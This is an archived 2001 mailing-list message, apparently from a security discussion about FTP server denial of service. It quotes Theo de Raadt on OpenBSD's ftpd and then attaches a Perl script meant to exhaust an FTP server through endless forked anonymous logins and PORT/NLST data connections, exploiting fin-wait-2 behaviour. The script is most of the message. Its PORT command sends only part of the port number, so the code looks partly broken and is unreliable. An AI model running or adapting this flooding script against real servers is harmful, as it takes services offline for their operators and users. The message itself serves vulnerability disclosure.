In some mail from Theo de Raadt, sie said: [...] > The OpenBSD ftpd has never permitted more than 1 connection at a time > in PASV mode, thus this particular denial of service attack does not > work. Excellent. > I caused myself some difficulties by accidentally starting up 400 perl > instances, though.. There's no helping pilot error ;) Below is an attached perl script which attacks based on the fin-wait-2 `problem'. Darren #!/usr/bin/perl $DOS_HOST="localhost"; use IO::Socket; $pid = $$; $num = 0; while (1) { while (fork) { $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $DOS_HOST, PeerPort => "ftp(21)", ); last if (!$sock); $me = getsockname($sock); ($mport, $mip) = unpack_sockaddr_in($me); if (!$sock) { print "connect failed!\n"; waitpid -1,0; } $sock->autoflush(1); while (<$sock>) { print; print $sock "USER anonymous\r\n" if (/^220 .*/); print $sock "PASS root@\r\n" if (/^331 .*/); if (/^150 .*/) { $conn[$num++] = $x->accept(); } elsif (/^200 .*/) { print $sock "NLST\r\n"; } elsif (/^230 .*/ || /^226 .*/) { $x = IO::Socket::INET->new( Proto => "tcp", LocalAddr => inet_ntoa($mip), Listen => 1, ); last if (!$x); $lsock[$num] = $x; $local = getsockname($x); ($lport, $lip) = unpack_sockaddr_in($local); ($sip = inet_ntoa($mip)) =~ s/\./,/g; $lp[0] = $lport >> 8; $lp[1] = $lport & 0xff; print $sock "PORT $sip,$lp[1]\r\n"; } last if (/^530 .*/); } waitpid -1,0; } sleep(5); }
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:19:17 PDT